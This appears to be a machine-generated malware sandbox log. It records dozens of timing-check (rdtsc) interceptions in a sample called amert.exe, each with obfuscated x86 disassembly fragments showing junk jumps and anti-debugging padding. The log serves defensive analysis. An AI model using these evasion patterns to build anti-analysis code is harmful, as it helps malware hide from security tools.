Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 500000E second address: 50000E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D755569E1h 0x00000009 add ecx, 57196D96h 0x0000000f jmp 00007F0D755569E1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0D755569DAh 0x00000022 add eax, 2A93D5B8h 0x00000028 jmp 00007F0D755569DBh 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007F0D755569E8h 0x00000034 and si, 9018h 0x00000039 jmp 00007F0D755569DBh 0x0000003e popfd 0x0000003f popad 0x00000040 push eax 0x00000041 jmp 00007F0D755569E9h 0x00000046 xchg eax, ebp 0x00000047 pushad 0x00000048 movzx ecx, di 0x0000004b pushfd 0x0000004c jmp 00007F0D755569E9h 0x00000051 sbb cx, 9316h 0x00000056 jmp 00007F0D755569E1h 0x0000005b popfd 0x0000005c popad 0x0000005d mov ebp, esp 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50000E3 second address: 50000E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50000E7 second address: 50000EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50000EB second address: 50000F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F9014F second address: 4F90154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90154 second address: 4F901BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558567h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0D75558566h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ebx, 75369F14h 0x00000016 pushfd 0x00000017 jmp 00007F0D7555855Dh 0x0000001c jmp 00007F0D7555855Bh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F0D75558560h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F901BD second address: 4F901C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F901C1 second address: 4F901C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0B78 second address: 4FB0BD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ch, dl 0x0000000d mov edx, esi 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F0D755569E2h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F0D755569DDh 0x00000021 xor cx, 9536h 0x00000026 jmp 00007F0D755569E1h 0x0000002b popfd 0x0000002c mov cx, 9127h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB07A9 second address: 4FB07AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB07AD second address: 4FB07F5 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 4Ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F0D755569DFh 0x0000000b mov si, AD5Fh 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0D755569E0h 0x00000019 adc ecx, 0DF9DDC8h 0x0000001f jmp 00007F0D755569DBh 0x00000024 popfd 0x00000025 pushad 0x00000026 mov ecx, 3E933555h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB07F5 second address: 4FB080B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov cl, 37h 0x0000000a movsx edi, cx 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB080B second address: 4FB080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB080F second address: 4FB0813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0813 second address: 4FB0819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB06F7 second address: 4FB0757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F0D75558563h 0x00000009 mov edi, eax 0x0000000b pop ecx 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov esi, edx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 movsx ebx, cx 0x0000001c pushad 0x0000001d mov ecx, 1FA6E7A9h 0x00000022 pushfd 0x00000023 jmp 00007F0D75558566h 0x00000028 xor ax, BF78h 0x0000002d jmp 00007F0D7555855Bh 0x00000032 popfd 0x00000033 popad 0x00000034 popad 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0757 second address: 4FB075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0503 second address: 4FB0509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0509 second address: 4FB050D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB050D second address: 4FB053E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558563h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D75558565h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FC01F1 second address: 4FC01F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FC01F7 second address: 4FC01FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FC01FD second address: 4FC025F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F0D755569E0h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0D755569E1h 0x00000019 and eax, 63D39056h 0x0000001f jmp 00007F0D755569E1h 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 mov ecx, 6AB4CB1Dh 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F14 second address: 4FF0F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558561h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007F0D75558563h 0x00000011 pop eax 0x00000012 jmp 00007F0D75558569h 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F0D75558561h 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F73 second address: 4FF0F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F77 second address: 4FF0F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F7B second address: 4FF0F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F81 second address: 4FF0F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F87 second address: 4FF0F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0302 second address: 4FD0357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 call 00007F0D7555855Bh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 mov ax, 2611h 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ebx 0x00000017 popad 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c pushad 0x0000001d mov ch, 22h 0x0000001f mov dx, C180h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007F0D7555855Fh 0x0000002b mov eax, dword ptr [ebp+08h] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F0D75558565h 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0357 second address: 4FD03CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D755569DAh 0x00000009 sub ax, 0228h 0x0000000e jmp 00007F0D755569DBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 and dword ptr [eax], 00000000h 0x0000001a jmp 00007F0D755569E6h 0x0000001f and dword ptr [eax+04h], 00000000h 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F0D755569DAh 0x0000002a or ah, FFFFFFB8h 0x0000002d jmp 00007F0D755569DBh 0x00000032 popfd 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F0D755569E5h 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0626 second address: 4FB062A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB062A second address: 4FB0630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0630 second address: 4FB0636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0636 second address: 4FB0652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0D755569DFh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0652 second address: 4FB0656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0656 second address: 4FB065C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB065C second address: 4FB066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D7555855Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0768 second address: 4FF076E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF076E second address: 4FF07A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558567h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D75558564h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF07A2 second address: 4FF07A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF07A7 second address: 4FF083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, E8C2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0D7555855Fh 0x00000013 and eax, 2F0F17BEh 0x00000019 jmp 00007F0D75558569h 0x0000001e popfd 0x0000001f mov ah, 21h 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F0D75558569h 0x0000002b add cx, B4A6h 0x00000030 jmp 00007F0D75558561h 0x00000035 popfd 0x00000036 push eax 0x00000037 push edx 0x00000038 pushfd 0x00000039 jmp 00007F0D7555855Eh 0x0000003e sub eax, 6EEEEA48h 0x00000044 jmp 00007F0D7555855Bh 0x00000049 popfd 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF083E second address: 4FF08AE instructions: 0x00000000 rdtsc 0x00000002 call 00007F0D755569E8h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F0D755569DEh 0x00000011 mov dword ptr [esp], ecx 0x00000014 jmp 00007F0D755569E0h 0x00000019 mov eax, dword ptr [76FB65FCh] 0x0000001e jmp 00007F0D755569E0h 0x00000023 test eax, eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0D755569E7h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF08AE second address: 4FF08FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0253C60Ah 0x00000008 push edi 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007F0DE749B601h 0x00000013 pushad 0x00000014 mov ecx, edx 0x00000016 push ebx 0x00000017 movzx esi, di 0x0000001a pop edx 0x0000001b popad 0x0000001c mov ecx, eax 0x0000001e jmp 00007F0D7555855Ah 0x00000023 xor eax, dword ptr [ebp+08h] 0x00000026 jmp 00007F0D75558561h 0x0000002b and ecx, 1Fh 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F0D7555855Dh 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF08FC second address: 4FF0923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, EBh 0x00000005 jmp 00007F0D755569E8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d ror eax, cl 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0923 second address: 4FF093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F0D75558563h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF093C second address: 4FF0942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0942 second address: 4FF0946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA001D second address: 4FA00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F0D755569E8h 0x0000000b and ah, 00000048h 0x0000000e jmp 00007F0D755569DBh 0x00000013 popfd 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 push edx 0x00000018 mov ax, A851h 0x0000001c pop eax 0x0000001d mov si, bx 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 call 00007F0D755569DFh 0x00000028 pop edx 0x00000029 pushfd 0x0000002a jmp 00007F0D755569E4h 0x0000002f adc esi, 4D1E1308h 0x00000035 jmp 00007F0D755569DBh 0x0000003a popfd 0x0000003b popad 0x0000003c mov ebp, esp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F0D755569E5h 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA00AA second address: 4FA00CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558561h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA00CF second address: 4FA00D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA00D3 second address: 4FA00EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558563h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA00EA second address: 4FA015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0D755569E7h 0x00000011 add cx, 4C1Eh 0x00000016 jmp 00007F0D755569E9h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ecx 0x0000001e jmp 00007F0D755569DDh 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0D755569DDh 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA015F second address: 4FA016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D7555855Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA016F second address: 4FA01CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pushfd 0x0000000f jmp 00007F0D755569E2h 0x00000014 xor ax, 96D8h 0x00000019 jmp 00007F0D755569DBh 0x0000001e popfd 0x0000001f pop ecx 0x00000020 movsx edx, ax 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 jmp 00007F0D755569E0h 0x0000002a mov ebx, dword ptr [ebp+10h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0D755569DAh 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA01CE second address: 4FA01D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA01D4 second address: 4FA01E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569DDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA01E5 second address: 4FA0237 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558561h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov esi, 064700E3h 0x00000012 mov di, ax 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F0D75558565h 0x0000001c xchg eax, esi 0x0000001d pushad 0x0000001e push edi 0x0000001f pushad 0x00000020 popad 0x00000021 pop esi 0x00000022 popad 0x00000023 mov esi, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F0D7555855Eh 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0237 second address: 4FA0259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov ebx, 3C2B8BF6h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bx, B1FCh 0x00000019 mov bl, F1h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0259 second address: 4FA0291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 60961600h 0x00000008 pushfd 0x00000009 jmp 00007F0D75558569h 0x0000000e jmp 00007F0D7555855Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0291 second address: 4FA0295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0295 second address: 4FA02B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558567h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA02B0 second address: 4FA030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D755569DFh 0x00000009 xor cl, FFFFFFEEh 0x0000000c jmp 00007F0D755569E9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F0D755569E0h 0x00000018 adc eax, 35775B68h 0x0000001e jmp 00007F0D755569DBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 test esi, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA030E second address: 4FA0312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0312 second address: 4FA0318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0318 second address: 4FA035F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7555855Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0DE74E6845h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F0D7555855Eh 0x00000016 adc si, 18F8h 0x0000001b jmp 00007F0D7555855Bh 0x00000020 popfd 0x00000021 mov si, 8E2Fh 0x00000025 popad 0x00000026 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA035F second address: 4FA0365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
